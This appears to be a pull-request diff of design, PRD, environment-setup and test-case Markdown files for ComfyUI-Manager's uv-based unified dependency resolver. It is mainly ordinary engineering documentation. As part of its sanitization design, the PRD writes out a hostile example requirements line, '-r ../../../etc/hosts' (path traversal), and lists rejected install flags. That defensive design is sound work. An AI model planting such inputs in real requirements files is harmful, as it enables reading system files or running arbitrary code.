- **Downgrade blacklist** (version comparison logic included)
- **Input sanitization** (-r, -e, @ file:// etc. rejection)
- **`--index-url` / `--extra-index-url` separation handling** (package spec + extra_index_urls)
- **`.disabled` node pack filtering**
- Defensive cm_global access (getattr pattern)
2. **Phase 2**: `compile_lockfile` implementation + tests
- uv pip compile invocation
- --output-file, --constraint, --python options
- Conflict parsing logic
3. **Phase 3**: `install_from_lockfile` implementation + tests
- uv pip install -r invocation (NOT sync)
- Install result parsing
4. **Phase 4**: Integration — startup batch + install-time skip
- `prestartup_script.py`: Module-scope startup batch resolver + `execute_lazy_install_script()` deps skip
- `manager_core.py`: Skip per-node pip in 2 `execute_install_script()` locations
- `manager_util.py`: `use_unified_resolver` flag
- Config reading (`read_unified_resolver_mode()`, `read_config()`/`write_config()`)
5. **Phase 5**: Integration tests + fallback verification + startup batch tests
---
## Appendix A: Existing Code Reference
> **Note**: Line numbers may shift as code changes, so references use symbol names (function/class names).
> Use `grep -n` or IDE symbol search for exact locations.
### remap_pip_package Location (Code Duplication Exists)
```
comfyui_manager/glob/manager_core.py — def remap_pip_package(pkg)
comfyui_manager/prestartup_script.py — def remap_pip_package(pkg)
```
Both reference `cm_global.pip_overrides` with identical logic.
The unified resolver uses `cm_global.pip_overrides` directly to avoid adding more duplication.
### cm_global Global State
```python
# Dynamically assigned in prestartup_script.py (NOT defined in cm_global.py!)
cm_global.pip_blacklist = {'torch', 'torchaudio', 'torchsde', 'torchvision'} # set
cm_global.pip_overrides = {} # dict, loaded from JSON
cm_global.pip_downgrade_blacklist = [ # list
'torch', 'torchaudio', 'torchsde', 'torchvision',
'transformers', 'safetensors', 'kornia'
]
```
> **cm_cli path**: `cm_cli/__main__.py` also independently initializes these attributes.
> If the resolver may be called from the CLI path, this initialization should also be verified.
### PIPFixer Call Pattern
```python
# Within UnifiedManager.execute_install_script() method in manager_core.py:
pip_fixer = manager_util.PIPFixer(
manager_util.get_installed_packages(),
context.comfy_path,
context.manager_files_path
)
# ... (after installation)
pip_fixer.fix_broken()
```
The unified resolver does not call PIPFixer directly.
The caller (execute_install_script) calls PIPFixer as part of the existing flow.
### is_blacklisted() Logic (Must Be Reproduced in Unified Resolver)
```python
# manager_core.py — def is_blacklisted(name)
# 1. Simple pip_blacklist membership check
# 2. pip_downgrade_blacklist version comparison:
# - Parse spec with regex r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
# - match is None (no version spec) + installed → block
# - Operator in ['<=', '==', '<', '~='] + installed version >= requested version → block
# - Version comparison uses manager_util.StrictVersion (NOT packaging.version)
```
The unified resolver's `_is_downgrade_blacklisted()` method faithfully reproduces this logic.
It uses `manager_util.StrictVersion` instead of `packaging.version.parse()` to ensure consistency with existing behavior.
### Existing Code --index-url Handling (Asymmetric)
```python
# Only exists in standalone function execute_install_script():
if '--index-url' in package_name:
s = package_name.split('--index-url')
install_cmd = manager_util.make_pip_cmd(["install", s[0].strip(), '--index-url', s[1].strip()])
# UnifiedManager.execute_install_script() method does NOT have this handling
```
The unified resolver unifies both paths for consistent handling via `_split_index_url()`.

View File

@ -0,0 +1,363 @@
# PRD: Unified Dependency Resolver
## 1. Overview
### 1.1 Background
ComfyUI Manager currently installs each node pack's `requirements.txt` individually via `pip install`.
This approach causes dependency conflicts where installing a new node pack can break previously installed node packs' dependencies.
**Current flow:**
```mermaid
graph LR
A1[Install node pack A] --> A2[pip install A's deps] --> A3[Run install.py]
B1[Install node pack B] --> B2[pip install B's deps] --> B3[Run install.py]
B2 -.->|May break<br/>A's deps| A2
```
### 1.2 Goal
Implement a unified dependency installation module that uses `uv` to resolve all dependencies (installed node packs + new node packs) at once.
**New flow (unified resolver mode):**
```mermaid
graph TD
subgraph "Install Time (immediate)"
A1[User installs node pack X] --> A2[Git clone / download]
A2 --> A3["Run X's install.py (if exists)"]
A3 --> A4["Skip per-node pip install<br/>(deps deferred to restart)"]
end
subgraph "ComfyUI Restart (startup batch)"
B1[prestartup_script.py] --> B2[Collect ALL installed node packs' deps]
B2 --> B3["uv pip compile → pinned requirements.txt"]
B3 --> B4["uv pip install -r → Batch install"]
B4 --> B5[PIPFixer environment correction]
end
```
> **Terminology**: In this document, "lockfile" refers to the **pinned requirements.txt** generated by `uv pip compile`.
> This is different from the `uv.lock` (TOML format) generated by `uv lock`. We use a pip-compatible workflow.
### 1.3 Scope
- Develop a new dedicated dependency resolution module
- Opt-in activation from the existing install process
- **Handles dependency resolution (deps install) only**. `install.py` execution is handled by existing logic
---
## 2. Constraints
| Item | Description |
|------|-------------|
| **uv required** | Only operates in environments where `uv` is available |
| **Independent of `use_uv` flag** | `use_unified_resolver` is separate from the existing `use_uv` flag. Even if `use_uv=False`, setting `use_unified_resolver=True` attempts resolver activation. Auto-fallback if uv is not installed |
| **Pre-validated list** | Input node pack list is assumed to be pre-verified for mutual dependency compatibility |
| **Backward compatibility** | Existing pip-based install process is fully preserved (fallback) |
| **Blacklist/overrides bypassed** | In unified mode, `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` are NOT applied (empty values passed). Constructor interface is preserved for future extensibility. `uv pip compile` handles all conflict resolution natively. **[DEFERRED]** Reading actual values from `cm_global` at startup is deferred to a future version — v1 always passes empty values |
| **Multiple custom_nodes paths** | Supports all paths returned by `folder_paths.get_folder_paths('custom_nodes')` |
| **Scope of application** | Batch resolver runs at **module scope** in `prestartup_script.py` (unconditionally when enabled, independent of `install-scripts.txt` existence). The 2 `execute_install_script()` locations skip per-node pip install when unified mode is active (deps deferred to restart). `execute_lazy_install_script()` is also modified to skip per-node pip install in unified mode. Other install paths such as `install_manager_requirements()`, `pip_install()` are outside v1 scope (future extension) |
| **Legacy module** | `comfyui_manager/legacy/manager_core.py` is excluded from modification. Legacy paths retain existing pip behavior |
---
## 3. Functional Requirements
### FR-1: Node Pack List and Base Dependency Input
**Input:**
- Node pack list (fullpath list of installed + to-be-installed node packs)
- Base dependencies (ComfyUI's `requirements.txt` and `manager_requirements.txt`)
**Behavior:**
- Validate each node pack path
- Exclude disabled (`.disabled`) node packs
- Detection criteria: Existence of `custom_nodes/.disabled/{node_pack_name}` **directory**
- Existing mechanism: Disabling a node pack **moves** it from `custom_nodes/` to `custom_nodes/.disabled/` (does NOT create a `.disabled` file inside the node pack)
- At resolver input time, disabled node packs should already be absent from `custom_nodes/`, so normally they won't be in `node_pack_paths`
- Defensively exclude any node pack paths that are within the `.disabled` directory
- Base dependencies are treated as constraints
- Traverse all paths from `folder_paths.get_folder_paths('custom_nodes')`
**`cm_global` runtime dependencies:**
- `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are dynamically assigned during `prestartup_script.py` execution
- In unified mode, these are **not applied** — empty values are passed to the resolver constructor
- The constructor interface accepts these parameters for future extensibility (defaults to empty when `None`)
### FR-2: Dependency List Extraction
**Behavior:**
- Parse `requirements.txt` from each node pack directory
- Encoding: Use `robust_readlines()` pattern (`chardet` detection, assumes UTF-8 if not installed)
- Package name remapping (constructor accepts `overrides` dict — **empty in v1**, interface preserved for extensibility)
- Blacklist package filtering (constructor accepts `blacklist` set — **empty in v1**, uv handles torch etc. natively)
- Downgrade blacklist filtering (constructor accepts `downgrade_blacklist` list — **empty in v1**)
- **Note**: In unified mode, `uv pip compile` resolves all version conflicts natively. The blacklist/overrides/downgrade_blacklist mechanisms from the existing pip flow are bypassed
- Strip comments (`#`) and blank lines
- **Input sanitization** (see below)
- Separate handling of `--index-url` entries (see below)
**Input sanitization:**
- Requirements lines matching the following patterns are **rejected and logged** (security defense):
- `-r`, `--requirement` (recursive include → path traversal risk)
- `-e`, `--editable` (VCS/local path install → arbitrary code execution risk)
- `-c`, `--constraint` (external constraint file injection)
- `--find-links`, `-f` (external package source specification)
- `@ file://` (local file reference → path traversal risk)
- Package names containing path separators (`/`, `\`)
- Allowed items: Package specs (`name>=version`), specs with `--index-url`, environment markers (containing `;`)
- Rejected lines are recorded in the `skipped` list with reason
**`--index-url` handling:**
- Existing code (standalone function `execute_install_script()`) parses `package_name --index-url URL` format for special handling
- **Note**: The class method `UnifiedManager.execute_install_script()` does NOT have this handling (asymmetric)
- The unified resolver **unifies both paths** for consistent handling:
- Package spec → added to the general dependency list
- `--extra-index-url URL` → passed as `uv pip compile` argument
- Separated index URLs are collected in `CollectedDeps.extra_index_urls`
- **Credential redaction**: Authentication info (`user:pass@`) in index URLs is masked during logging
**Duplicate handling strategy:**
- No deduplication is performed directly
- Different version specs of the same package are **all passed as-is** to uv
- `uv pip compile` handles version resolution (uv determines the optimal version)
**Output:**
- Unified dependency list (tracked by source node pack)
- Additional index URL list
### FR-3: uv pip compile Execution
**Behavior:**
- Generate temporary requirements file from the collected dependency list
- Execute `uv pip compile` to produce a pinned requirements.txt
- `--output-file` (required): Specify output file (outputs to stdout only if not specified)
- `--constraint`: Pass base dependencies as constraints
- `--python`: Current Python interpreter path
- `--extra-index-url`: Additional index URLs collected from FR-2 (multiple allowed)
- Resolve for the current platform (platform-specific results)
**Error handling:**
- Return conflict package report when resolution fails
- Timeout handling (300s): Explicitly catch `subprocess.TimeoutExpired`, terminate child process, then fallback
- Lockfile output file existence verification: Confirm file was actually created even when `returncode == 0`
- Temp file cleanup: Guaranteed in `finally` block. Includes stale temp file cleanup logic at next execution for abnormal termination (SIGKILL) scenarios
**Output:**
- pinned requirements.txt (file with all packages pinned to exact versions)
### FR-4: Pinned Requirements-based Dependency Installation
**Behavior:**
- Execute `uv pip install -r <pinned-requirements.txt>`
- **Do NOT use `uv pip sync`**: sync deletes packages not in the lockfile, risking removal of torch, ComfyUI's own dependencies, etc.
- Already-installed packages at the same version are skipped (default uv behavior)
- Log installation results
**Error handling:**
- `uv pip install -r` is an **atomic operation** (all-or-nothing)
- On total failure: Parse stderr for failure cause report → fallback to existing pip
- **No partial failure report** (not possible due to uv's behavior)
- `InstallResult`'s `installed`/`skipped` fields are populated by parsing uv stdout; `stderr` records failure cause (no separate `failed` field needed due to atomic model)
### FR-5: Post-install Environment Correction
**Behavior:**
- Call `PIPFixer.fix_broken()` for environment integrity correction
- Restore torch version (when change detected)
- Fix OpenCV conflicts
- Restore comfyui-frontend-package
- Restore packages based on `pip_auto_fix.list`
- **This step is already performed in the existing `execute_install_script()` flow, so the unified resolver itself doesn't need to call it**
- However, an optional call option is provided for cases where the resolver is invoked independently outside the existing flow
### FR-6: install.py Execution (Existing Flow Maintained)
**Behavior:**
- The unified resolver handles deps installation **at startup time only**
- `install.py` execution is handled by the existing `execute_install_script()` flow and runs **immediately** at install time
- Deps are deferred to startup batch resolution; `install.py` runs without waiting for deps
**Control flow specification (unified mode active):**
- `execute_install_script()`: **skip** the `requirements.txt`-based individual pip install loop entirely (deps will be resolved at next restart)
- `install.py` execution runs **immediately** as before
- At next ComfyUI restart: `prestartup_script.py` runs the unified resolver for all installed node packs
**Control flow specification (unified mode inactive / fallback):**
- Existing pip install loop runs as-is (no change)
- `install.py` execution runs **immediately** as before
### FR-7: Startup Batch Resolution
**Behavior:**
- When `use_unified_resolver=True`, **all dependency resolution is deferred to ComfyUI startup**
- At install time: node pack itself is installed (git clone, etc.) and `install.py` runs immediately, but `requirements.txt` deps are **not** installed per-request
- At startup time: `prestartup_script.py` runs the unified resolver once for all installed node packs
**Startup execution flow (in `prestartup_script.py`):**
1. At **module scope** (before `execute_startup_script()` gate): check `manager_util.use_unified_resolver` flag
2. If enabled: collect all installed node pack paths, read base requirements from `comfy_path`
3. Create `UnifiedDepResolver` with empty blacklist/overrides/downgrade_blacklist (uv handles resolution natively)
4. Call `resolve_and_install()` — collects all deps → compile → install in one batch
5. On success: set `_unified_resolver_succeeded = True`, skip per-node pip in `execute_lazy_install_script()`
6. On failure: log warning, `execute_lazy_install_script()` falls back to existing per-node pip install
7. **Note**: Runs unconditionally when enabled, independent of `install-scripts.txt` existence
**`execute_install_script()` behavior in unified mode:**
- Skip the `requirements.txt` pip install loop entirely (deps will be handled at restart)
- `install.py` execution still runs immediately
**`execute_lazy_install_script()` behavior in unified mode:**
- Skip the `requirements.txt` pip install loop (already handled by startup batch resolver)
- `install.py` execution still runs
**Windows-specific behavior:**
- Windows lazy install path also benefits from startup batch resolution
- `try_install_script()` defers to `reserve_script()` as before for non-`instant_execution=True` installs
---
## 4. Non-functional Requirements
| Item | Requirement |
|------|-------------|
| **Performance** | Equal to or faster than existing individual installs |
| **Stability** | Must not break the existing environment |
| **Logging** | Log progress and results at each step (details below) |
| **Error recovery** | Fallback to existing pip method on failure |
| **Testing** | Unit test coverage above 80% |
| **Security** | requirements.txt input sanitization (see FR-2), credential log redaction, subprocess list-form invocation |
| **Concurrency** | Prevent lockfile path collisions on concurrent install requests. Use process/thread-unique suffixes or temp directories |
| **Temp files** | Guarantee temp file cleanup on both normal and abnormal termination. Clean stale files on next execution |
### Logging Requirements
| Step | Log Level | Content |
|------|-----------|---------|
| Resolver start | `INFO` | Node pack count, total dependency count, mode (unified/pip) |
| Dependency collection | `INFO` | Collection summary (collected N, skipped N, sources N) |
| Dependency collection | `DEBUG` | Per-package collection/skip/remap details |
| `--index-url` detection | `INFO` | Detected additional index URL list |
| uv compile start | `INFO` | Execution command (excluding sensitive info) |
| uv compile success | `INFO` | Pinned package count, elapsed time |
| uv compile failure | `WARNING` | Conflict details, fallback transition notice |
| Install start | `INFO` | Number of packages to install |
| Install success | `INFO` | Installed/skipped/failed count summary, elapsed time |
| Install failure | `WARNING` | Failed package list, fallback transition notice |
| Fallback transition | `WARNING` | Transition reason, original error message |
| Overall completion | `INFO` | Final result summary (success/fallback/failure) |
> **Log prefix**: All logs use `[UnifiedDepResolver]` prefix to distinguish from existing pip install logs
---
## 5. Usage Scenarios
### Scenario 1: Single Node Pack Installation (unified mode)
```
User requests installation of node pack X
→ Git clone / download node pack X
→ Run X's install.py (if exists) — immediately
→ Skip per-node pip install (deps deferred)
→ User restarts ComfyUI
→ prestartup_script.py: Collect deps from ALL installed node packs (A,B,C,X)
→ uv pip compile resolves fully compatible versions
→ uv pip install -r for batch installation
→ PIPFixer environment correction
```
### Scenario 2: Multi Node Pack Batch Installation (unified mode)
```
User requests installation of node packs X, Y, Z
→ Each node pack: git clone + install.py — immediately
→ Per-node pip install skipped for all
→ User restarts ComfyUI
→ prestartup_script.py: Collect deps from ALL installed node packs (including X,Y,Z)
→ Single uv pip compile → single uv pip install -r
→ PIPFixer environment correction
```
### Scenario 3: Dependency Resolution Failure (Edge Case)
```
Even pre-validated lists may fail due to uv version differences or platform issues
→ uv pip compile failure → return conflict report
→ Display conflict details to user
→ Auto-execute existing pip fallback
```
### Scenario 4: uv Not Installed
```
uv unavailable detected → auto-fallback to existing pip method
→ Display uv installation recommendation to user
```
### Scenario 5: Windows Lazy Installation (unified mode)
```
Node pack installation requested on Windows
→ Node pack install deferred to startup (existing lazy mechanism)
→ On next ComfyUI startup: unified resolver runs first (batch deps)
→ execute_lazy_install_script() skips per-node pip (already resolved)
→ install.py still runs per node pack
```
### Scenario 6: Malicious/Non-standard requirements.txt
```
Node pack's requirements.txt contains `-r ../../../etc/hosts` or `-e git+https://...`
→ Sanitization filter rejects the line
→ Log rejection reason and continue processing remaining valid packages
→ Notify user of rejected item count
```
### Scenario 7: Concurrent Install Requests (unified mode)
```
User requests installation of node packs A and B nearly simultaneously from UI
→ Each request: git clone + install.py immediately, deps skipped
→ On restart: single unified resolver run handles both A and B deps together
→ No concurrency issue (single batch at startup)
```
---
## 6. Success Metrics
| Metric | Target |
|--------|--------|
| Dependency conflict reduction | 90%+ reduction compared to current |
| Install success rate | 99%+ (for compatibility-verified lists) |
| Performance | Equal to or better than existing individual installs |
| Adoption rate | 50%+ of eligible users |
---
## 7. Future Extensions
- ~~**`cm_global` integration** [DONE]: All `--uv-compile` CLI commands (`uv-compile`, `install`, `reinstall`, `update`, `fix`, `restore-snapshot`, `restore-dependencies`, `install-deps`) pass real `cm_global` values. Startup path (`prestartup_script.py`) still passes empty by design~~
- Lockfile caching: Reuse for identical node pack configurations
- Pre-install dependency conflict validation API: Check compatibility before installation
- Dependency tree visualization: Display dependency relationships to users
- `uv lock`-based cross-platform lockfile support (TOML format)
- `install_manager_requirements()` integration: Resolve manager's own dependencies through unified resolver
- `pip_install()` integration: Route UI direct installs through unified resolver
- Legacy module (`comfyui_manager/legacy/`) unified resolver support
---
## Appendix A: Existing Code Install Path Mapping
> This section is reference material to clarify the unified resolver's scope of application.
| Install Path | Location | v1 Applied | Notes |
|-------------|----------|------------|-------|
| `UnifiedManager.execute_install_script()` | `glob/manager_core.py` (method) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
| Standalone `execute_install_script()` | `glob/manager_core.py` (function) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
| `execute_lazy_install_script()` | `prestartup_script.py` | ✅ Yes | Skips per-node pip in unified mode (already batch-resolved) |
| Startup batch resolver | `prestartup_script.py` | ✅ Yes | **New**: Runs unified resolver once at startup for all node packs |
| `install_manager_requirements()` | `glob/manager_core.py` | ❌ No | Manager's own deps |
| `pip_install()` | `glob/manager_core.py` | ❌ No | UI direct install |
| Legacy `execute_install_script()` (2 locations) | `legacy/manager_core.py` | ❌ No | Legacy paths |
| `cm_cli uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Standalone CLI batch resolution (with `cm_global` values) |
| `cm_cli install --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped, batch resolution after all installs |
| `cm_cli reinstall --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped, batch resolution after all reinstalls; mutually exclusive with `--no-deps` |
| `cm_cli update --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped during updates, batch resolution after |
| `cm_cli fix --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped during dep fix, batch resolution after |
| `cm_cli restore-snapshot --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped during restore, batch resolution after |
| `cm_cli restore-dependencies --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped, batch resolution after all node deps restored |
| `cm_cli install-deps --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped, batch resolution after deps-spec install |

View File

@ -0,0 +1,194 @@
# Test Environment Setup
Procedures for setting up a ComfyUI environment with ComfyUI-Manager installed for functional testing.
## Automated Setup (Recommended)
Three shell scripts in `tests/e2e/scripts/` automate the entire lifecycle:
```bash
# 1. Setup: clone ComfyUI, create venv, install deps, symlink Manager
E2E_ROOT=/tmp/e2e_test MANAGER_ROOT=/path/to/comfyui-manager-draft4 \
bash tests/e2e/scripts/setup_e2e_env.sh
# 2. Start: launches ComfyUI in background, blocks until ready
E2E_ROOT=/tmp/e2e_test bash tests/e2e/scripts/start_comfyui.sh
# 3. Stop: graceful SIGTERM → SIGKILL shutdown
E2E_ROOT=/tmp/e2e_test bash tests/e2e/scripts/stop_comfyui.sh
# 4. Cleanup
rm -rf /tmp/e2e_test
```
### Script Details
| Script | Purpose | Input | Output |
|--------|---------|-------|--------|
| `setup_e2e_env.sh` | Full environment setup (8 steps) | `E2E_ROOT`, `MANAGER_ROOT`, `COMFYUI_BRANCH` (default: master), `PYTHON` (default: python3) | `E2E_ROOT=<path>` on last line |
| `start_comfyui.sh` | Foreground-blocking launcher | `E2E_ROOT`, `PORT` (default: 8199), `TIMEOUT` (default: 120s) | `COMFYUI_PID=<pid> PORT=<port>` |
| `stop_comfyui.sh` | Graceful shutdown | `E2E_ROOT`, `PORT` (default: 8199) | — |
**Idempotent**: `setup_e2e_env.sh` checks for a `.e2e_setup_complete` marker file and skips setup if the environment already exists.
**Blocking mechanism**: `start_comfyui.sh` uses `tail -n +1 -f | grep -q -m1 'To see the GUI'` to block until ComfyUI is ready. No polling loop needed.
---
## Prerequisites
- Python 3.9+
- Git
- `uv` (install via `pip install uv` or [standalone](https://docs.astral.sh/uv/getting-started/installation/))
## Manual Setup (Reference)
For understanding or debugging, the manual steps are documented below. The automated scripts execute these same steps.
### 1. ComfyUI Clone
```bash
COMFY_ROOT=$(mktemp -d)/ComfyUI
git clone https://github.com/comfyanonymous/ComfyUI.git "$COMFY_ROOT"
cd "$COMFY_ROOT"
```
### 2. Virtual Environment
```bash
cd "$COMFY_ROOT"
uv venv .venv
source .venv/bin/activate # Linux/macOS
# .venv\Scripts\activate # Windows
```
### 3. ComfyUI Dependencies
```bash
# GPU (CUDA)
uv pip install -r requirements.txt --extra-index-url https://download.pytorch.org/whl/cu121
# CPU only (lightweight, for functional testing)
uv pip install -r requirements.txt --extra-index-url https://download.pytorch.org/whl/cpu
```
### 4. ComfyUI-Manager Install (Development)
```bash
# MANAGER_ROOT = comfyui-manager-draft4 repository root
MANAGER_ROOT=/path/to/comfyui-manager-draft4
# Editable install from current source
uv pip install -e "$MANAGER_ROOT"
```
> **Note**: Editable mode (`-e`) reflects code changes without reinstalling.
> For production-like testing, use `uv pip install "$MANAGER_ROOT"` (non-editable).
### 5. Symlink Manager into custom_nodes
```bash
ln -s "$MANAGER_ROOT" "$COMFY_ROOT/custom_nodes/ComfyUI-Manager"
```
### 6. Write config.ini
```bash
mkdir -p "$COMFY_ROOT/user/__manager"
cat > "$COMFY_ROOT/user/__manager/config.ini" << 'EOF'
[default]
use_uv = true
use_unified_resolver = true
EOF
```
> **IMPORTANT**: The config path is `$COMFY_ROOT/user/__manager/config.ini`, resolved by `folder_paths.get_system_user_directory("manager")`. It is NOT inside the symlinked Manager directory.
### 7. HOME Isolation
```bash
export HOME=/tmp/e2e_home
mkdir -p "$HOME/.config" "$HOME/.local/share"
```
### 8. ComfyUI Launch
```bash
cd "$COMFY_ROOT"
PYTHONUNBUFFERED=1 python main.py --enable-manager --cpu --port 8199
```
| Flag | Purpose |
|------|---------|
| `--enable-manager` | Enable ComfyUI-Manager (disabled by default) |
| `--cpu` | Run without GPU (for functional testing) |
| `--port 8199` | Use non-default port to avoid conflicts |
| `--enable-manager-legacy-ui` | Enable legacy UI (optional) |
| `--listen` | Allow remote connections (optional) |
### Key Directories
| Directory | Path | Description |
|-----------|------|-------------|
| ComfyUI root | `$COMFY_ROOT/` | ComfyUI installation root |
| Manager data | `$COMFY_ROOT/user/__manager/` | Manager config, startup scripts, snapshots |
| Config file | `$COMFY_ROOT/user/__manager/config.ini` | Manager settings (`use_uv`, `use_unified_resolver`, etc.) |
| custom_nodes | `$COMFY_ROOT/custom_nodes/` | Installed node packs |
> The Manager data path is resolved via `folder_paths.get_system_user_directory("manager")`.
> Printed at startup: `** ComfyUI-Manager config path: <path>/config.ini`
### Startup Sequence
When Manager loads successfully, the following log lines appear:
```
[PRE] ComfyUI-Manager # prestartup_script.py executed
[START] ComfyUI-Manager # manager_server.py loaded
```
The `Blocked by policy` message for Manager in custom_nodes is **expected**`should_be_disabled()` in `comfyui_manager/__init__.py` prevents legacy double-loading when Manager is already pip-installed.
---
## Caveats & Known Issues
### PYTHONPATH for `comfy` imports
ComfyUI's `comfy` package is a **local package** inside the ComfyUI directory — it is NOT pip-installed. Any code that imports from `comfy` (including `comfyui_manager.__init__`) requires `PYTHONPATH` to include the ComfyUI directory:
```bash
PYTHONPATH="$COMFY_ROOT" python -c "import comfy"
PYTHONPATH="$COMFY_ROOT" python -c "import comfyui_manager"
```
The automated scripts handle this via `PYTHONPATH` in verification checks and the ComfyUI process inherits it implicitly by running from the ComfyUI directory.
### config.ini path
The config file must be at `$COMFY_ROOT/user/__manager/config.ini`, **NOT** inside the Manager symlink directory. This is resolved by `folder_paths.get_system_user_directory("manager")` at `prestartup_script.py:65-73`.
### Manager v4 endpoint prefix
All Manager endpoints use the `/v2/` prefix (e.g., `/v2/manager/queue/status`, `/v2/snapshot/get_current`). Paths without the prefix will return 404.
### `Blocked by policy` is expected
When Manager detects that it's loaded as a custom_node but is already pip-installed, it prints `Blocked by policy` and skips legacy loading. This is intentional behavior in `comfyui_manager/__init__.py:39-51`.
### Bash `((var++))` trap
Under `set -e`, `((0++))` evaluates the pre-increment value (0), and `(( 0 ))` returns exit code 1, killing the script. Use `var=$((var + 1))` instead.
### `git+https://` URLs in requirements.txt
Some node packs (e.g., Impact Pack's SAM2 dependency) use `git+https://github.com/...` URLs. The unified resolver correctly rejects these with "rejected path separator" — they must be installed separately.
---
## Cleanup
```bash
deactivate
rm -rf "$COMFY_ROOT"
```

View File

@ -0,0 +1,788 @@
# Test Cases: Unified Dependency Resolver
See [TEST-environment-setup.md](TEST-environment-setup.md) for environment setup.
## Enabling the Resolver
Add the following to `config.ini` (in the Manager data directory):
```ini
[default]
use_unified_resolver = true
```
> Config path: `$COMFY_ROOT/user/__manager/config.ini`
> Also printed at startup: `** ComfyUI-Manager config path: <path>/config.ini`
**Log visibility note**: `[UnifiedDepResolver]` messages are emitted via Python's `logging` module (INFO and WARNING levels), not `print()`. Ensure the logging level is set to INFO or lower. ComfyUI defaults typically show these, but if messages are missing, check that the root logger or the `ComfyUI-Manager` logger is not set above INFO.
## API Reference (for Runtime Tests)
Node pack installation at runtime uses the task queue API:
```
POST http://localhost:8199/v2/manager/queue/task
Content-Type: application/json
```
> **Port**: E2E tests use port 8199 to avoid conflicts with running ComfyUI instances. Replace with your actual port if different.
**Payload** (`QueueTaskItem`):
| Field | Type | Description |
|-------|------|-------------|
| `ui_id` | string | Unique task identifier (any string) |
| `client_id` | string | Client identifier (any string) |
| `kind` | `OperationType` enum | `"install"`, `"uninstall"`, `"update"`, `"update-comfyui"`, `"fix"`, `"disable"`, `"enable"`, `"install-model"` |
| `params` | object | Operation-specific parameters (see below) |
**Install params** (`InstallPackParams`):
| Field | Type | Description |
|-------|------|-------------|
| `id` | string | CNR node pack ID (e.g., `"comfyui-impact-pack"`) or `"author/repo"` |
| `version` | string | Required by model. Set to same value as `selected_version`. |
| `selected_version` | string | **Controls install target**: `"latest"`, `"nightly"`, or specific semver |
| `mode` | string | `"remote"`, `"local"`, or `"cache"` |
| `channel` | string | `"default"`, `"recent"`, `"legacy"`, etc. |
> **Note**: `cm_cli` supports unified resolver via `cm_cli uv-compile` (standalone) and
> `cm_cli install --uv-compile` (install-time batch resolution). Without `--uv-compile`,
> installs use per-node pip via `legacy/manager_core.py`.
---
## Out of Scope (Deferred)
The following are intentionally **not tested** in this version:
- **cm_global integration (startup path only)**: At startup (`prestartup_script.py`), `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` are passed as empty defaults to the resolver. Integration with cm_global at startup is deferred to a future commit. Do not file defects for blacklist/override/downgrade behavior in startup unified mode. Note: `cm_cli uv-compile` and `cm_cli install --uv-compile` already pass real `cm_global` values (see PRD Future Extensions).
- **cm_cli per-node install (without --uv-compile)**: `cm_cli install` without `--uv-compile` imports from `legacy/manager_core.py` and uses per-node pip install. This is by design — use `cm_cli install --uv-compile` or `cm_cli uv-compile` for batch resolution.
- **Standalone `execute_install_script()`** (`glob/manager_core.py` ~line 1881): Has a unified resolver guard (`manager_util.use_unified_resolver`), identical to the class method guard. Reachable from the glob API via `update-comfyui` tasks (`update_path()` / `update_to_stable_comfyui()`), git-based node pack updates (`git_repo_update_check_with()` / `fetch_or_pull_git_repo()`), and gitclone operations. Also called from CLI and legacy server paths. The guard behaves identically to the class method at all call sites; testing it separately adds no coverage beyond TC-14 Path 1.
## CLI E2E Tests (`cm_cli uv-compile`)
These tests do **not** require ComfyUI server. Only a venv with `COMFYUI_PATH` set and
the E2E environment from `setup_e2e_env.sh` are needed.
**Common setup**:
```bash
source tests/e2e/scripts/setup_e2e_env.sh # → E2E_ROOT=...
export COMFYUI_PATH="$E2E_ROOT/comfyui"
VENV_PY="$E2E_ROOT/venv/bin/python"
```
---
### TC-CLI-1: Normal Batch Resolution [P0]
**Steps**:
1. Create a test node pack with a simple dependency:
```bash
mkdir -p "$COMFYUI_PATH/custom_nodes/test_cli_pack"
echo "chardet>=5.0" > "$COMFYUI_PATH/custom_nodes/test_cli_pack/requirements.txt"
```
2. Run:
```bash
$VENV_PY -m cm_cli uv-compile
```
**Verify**:
- Exit code: 0
- Output contains: `Resolved N deps from M source(s)`
- `chardet` is importable: `$VENV_PY -c "import chardet"`
**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/test_cli_pack"`
---
### TC-CLI-2: No Custom Node Packs [P1]
**Steps**:
1. Ensure `custom_nodes/` contains no node packs (only symlinks like `ComfyUI-Manager`
or empty dirs may remain)
2. Run:
```bash
$VENV_PY -m cm_cli uv-compile
```
**Verify**:
- Exit code: 0
- Output contains: `No custom node packs found` OR `Resolution complete (no deps needed)`
---
### TC-CLI-3: uv Unavailable [P0]
**Steps**:
1. Create a temporary venv **without** uv:
```bash
python3 -m venv /tmp/no_uv_venv
/tmp/no_uv_venv/bin/pip install comfyui-manager # or install from local
```
2. Ensure no standalone `uv` in PATH:
```bash
PATH="/tmp/no_uv_venv/bin" COMFYUI_PATH="$COMFYUI_PATH" \
/tmp/no_uv_venv/bin/python -m cm_cli uv-compile
```
**Verify**:
- Exit code: 1
- Output contains: `uv is not available`
**Cleanup**: `rm -rf /tmp/no_uv_venv`
---
### TC-CLI-4: Conflicting Dependencies [P0]
**Steps**:
1. Create two node packs with conflicting pinned versions:
```bash
mkdir -p "$COMFYUI_PATH/custom_nodes/conflict_a"
echo "numpy==1.24.0" > "$COMFYUI_PATH/custom_nodes/conflict_a/requirements.txt"
mkdir -p "$COMFYUI_PATH/custom_nodes/conflict_b"
echo "numpy==1.26.0" > "$COMFYUI_PATH/custom_nodes/conflict_b/requirements.txt"
```
2. Run:
```bash
$VENV_PY -m cm_cli uv-compile
```
**Verify**:
- Exit code: 1
- Output contains: `Resolution failed`
